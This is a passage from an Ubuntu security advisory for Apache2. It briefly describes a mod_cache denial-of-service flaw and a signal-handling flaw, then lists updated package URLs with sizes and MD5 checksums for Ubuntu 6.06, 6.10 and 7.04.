specially crafted request. A remote user could use this to cause a denial of service if Apache was configured to use a threaded worker. By default, mod_cache is disabled in Ubuntu. (CVE-2007-1863) A flaw was discovered in the signal handling of Apache. A local attacker could trick Apache into sending SIGUSR1 to other processes. The vulnerable code was only present in Ubuntu Feisty. (CVE-2007-3304) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.diff.gz Size/MD5: 115882 e94e45574e3b131d3a9a0e07e193f1e5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.dsc Size/MD5: 1148 c2bc143625fbf8ca59fea300845c5a42 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.2_all.deb Size/MD5: 2124364 9b8ca5d5757c63f5ee6bbd507f0a8357 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 833000 be4c7770c725f5f4401ca06d1347211f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 227832 41c12dfe84f109e6544a33e4e1d791a8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 222934 7e4d072bad27239e366a6eda94c09190 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 227576 8fc59f78a3fa0e5d6dac81e875039bda http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 171082 4318f93373b705563251f377ed398614 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 171860 257f4183d70be5a00546c39c5a18f108 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 93916 695cee55f91ceb9424abe31d8b6ee1dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 35902 00c1082a77ff1d863f72874c4472a26d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 285336 0a8510634b21f56f0d9619aa6fc9cec9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 143952 d75f83ac219bce95a15a8f44b82b8ea7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 786186 4e78fa0d438867194f66b11b4eb6fc2e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 202448 74cf60884e18c1fc93f157010a15b12c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 198456 209a0b92995fec453ed4c2c181e3e555 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 202038 6cbd437caf993fa2b2b38369cd3d5863 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 171074 0a5a26aa58af7aa2d51d1cf5d7c543d6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 171848 af9ca78febc5bc0c7936296dab958349 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 91884 2857d60b507b28c736f83815c9f3d1b8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 35906 202b5b233af0d26e29ca7302cf7fd04c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 261418 c90342706ac26682d15032a5ba5cb51a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 131850 951a4573901bc2f10d5febf940d57516 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 859126 afdd8642ca447fc9dc70dfed92be0fa6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 219898 6d9c9f924d2356bf9d3438a280870a7d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 215602 dd554132cdea0f860e01cf5d4e0dbc7c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 219378 7a1f4b325dacef287c901fa66680c04e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 171096 a0e2547d38ef1b84dc419d69e42ffa0b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 171864 200ab662b2c13786658486df37fda881 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 103628 ae36642fbd4698bb362fa4bf9417b0e3 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 35910 358027282f2f19451d3aa784dc0474dc http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 280950 0d9b56ec076da25e2a03f6d3c6445057 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 141074 f5d3d5e0e5911e0c0156ae55af50f87b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 803440 d66da6a91c08956c3c5062668349ef41 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 209970 57f0a8f823a4502ee9a2608e3181cc81 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 205582 1dcfb0df796e85c409f614544ea589fe http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 209330 6bf7ae824eea35d3487febef384fce91 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 171080 1088337f4abcb6c8f65751b6120c2307 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 171868 5cda04cd73a9c6d8dfc18abd55c09ebd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 92972 850ab3bb0904e8fe9b6255c42ba7f84c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 35904 7af260b95c4faa17ef34810fed888caf http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 267550 08182a8a2cab00fc0e6bca2cccf5165f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 129760 a60606c6d2f12209b0bdae997be4a13f Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.diff.gz Size/MD5: 116265 2732761b18dfb3c2cd1aa0b54c2cf623 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.dsc Size/MD5: 1148 4b9c4612469c521db0c5fdbe2f6b9b25 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu4.1_all.deb Size/MD5: 2124550 8d5c30342b35f9fd595fb09d7659b6fc amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 836342 2c4ba483b0b20fdc2d43819109177941 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 227390 e61cc1998f5b8f2c44dce587e59d288a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 222376 6bdbff7f7f80fd464d1e3ec52d6e7171 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 226848 4356b4caf2b40f364c8893c41b9f9355 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 171304 c4395af051e876228541ef5b8037d979 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 172074 99dadc4ad0f0947f9368d89f4589d95a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 94204 30f3bb8c72575fe93940ecc730b8e4b6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 36152 ea3cbefcbee7e2f6e5555edb44733ad9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 286544 d555931490d44d93bec31c4bfc19ed12 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 145014 3e06ceb0a55598d82f9f781c44e210b3 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 806938 050bb7665332d3761e1a8e47939fa507 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 209556 ee530b24aba8838001ebb6c901bc90cd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 205718 b52a17c63909eae3c49bad0ab1958f4b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 209158 1844fa5e09224a90944f8b886ddb5a2a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 171296 9de8aba41f7e3d60f41536ca712adebb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 172078 01ccd554177364747b08e2933f121d2c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 93240 4573597317416869646eb2ea42cd0945 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 36150 77666d65bade6a91bd58826c79f11dc9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 266390 a3963d8e76f6865404f7fadb47880c87 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 137604 387f6bcdaa58dbbe53082241b3231844 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 865372 27d7f1de1fcb2114d3f3b0a774302488 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 221542 1ae8fa5cf4b77f3b2aa054e2886e587e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 217044 9134983c40107f79fcac8d1eacbc7117 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 221324 b435dc09c63ecbcd564a0923a8f07350 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 171296 6d2a0abfb7a1daaeae56559eeb322dcb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 172064 ecc2037409554ea43c5a6848aa510c76 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 104654 d0957d8df044c4a34437241792ed97d1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 36148 34e102e1d2e1c6a6f31801dfb98cb82a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 284548 c8f325ccc42cbe77191d4ddd9abc2a4e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 144238 82cfbfcec5fc4931078145af8947c035 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 811594 d8548e537fd81994bbb638e105dfbf8b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 212160 81cd0197ff89b79c967c1074ede9f8d7 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 207870 5d80ed8dc39b0d4d59fccb747624a684 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 211578 9407383d85db831dab728b39cce9acc8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 171294 5e4d695a99bdc1fdfb0bfcef8b91d03d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 172064 06e3e765d799e281dba7329ff9d9e138 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 93796 1048b47b289fb2047fa9ac7ebbe94a57 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 36150 0d106a177aa4271b1cfc0e96eec1a748 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 268444 3912123e7c71cc638132305ca89fe23b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 130626 f4444e0239c2da7d3c31e3486606f95a Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.diff.gz Size/MD5: 112120 f7b1a17718aed7ca73da3a6d7aad06b0 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.dsc Size/MD5: 1128 e82b1bee591fff50d6673ed1a443e543 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3.orig.tar.gz Size/MD5: 6342475 f72ffb176e2dc7b322be16508c09f63c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 2199184 c03756f87cb164213428532f70e0c198 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 272064 5be351f491f8d1aae9a270d1214e93e3 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 6674104 bdbabf8f478562f0e003737e977ffc7b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 38668 9f0c7c01e8441285c084002eb4619065 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 449624 1b54a8000c40eaaa0f9e31527b9bb180 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 445346 d15625641a3247fbf5d9d9b9aed34968 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 449208 55f39c28a4de98d53f80231aeb7d6c59 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 403570 0042c75be8a2d128d62b79398deaefa8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 404138 929772b95ea67f338ad423a65b2b7011 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 341312 906819b0de863209575aa65d39a594a5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 971462 f85e32c5f6437ce149553aee97ffd934 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 432922 c1b81ac7dc7b7a0b2261fd10d9bcf5c6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 428856 f506f2a9dd2dbd5c2d3f72a476cc3537 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 432314 a5a11947ad8cf14604efa7ddcfd20bfe http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 403574 da84a3a99276f14a11ac892ce7eee170 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 404138 0fdd43a53e6957aa3a348a7bd9c876f5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 340396 88a0ddbc58335416d91c9f10adc9d5f5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 929716 138d58487b882e6002e3c5e4a9489add powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 451530 ddc437092ef642fcd396713cd1972f4c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 446960 af1b667708e062f81bca4e995355394d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 450940 ed9f31ec5045a88446115987c6e97655 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 403574 65801ab51335a15dc370b9341a0e50dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 404146 fd35e65fadd836feb0190b209947b466 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 360518 b74bc9eead429cd8f0ebecd6a94e5edb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 1073812 376fe5b1ee383a6d870eea5dd3c6a704 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 434408 c70ef2e9aed191fe53886ceb3725596e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 430574 7b690896da23a151ee5e106d596c1143 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 433918 cc01edfcfc673ba9a86c83fcc66e6870 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 403568 a7660cff70394403c764cf8f30c7298a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 404136 b8587d5eba0be59a6576d6cf645b2122 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 343370 1572a001a612add57d23350210ac1736 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 938586 b74a91fcfbb0503355e94981310bd1ce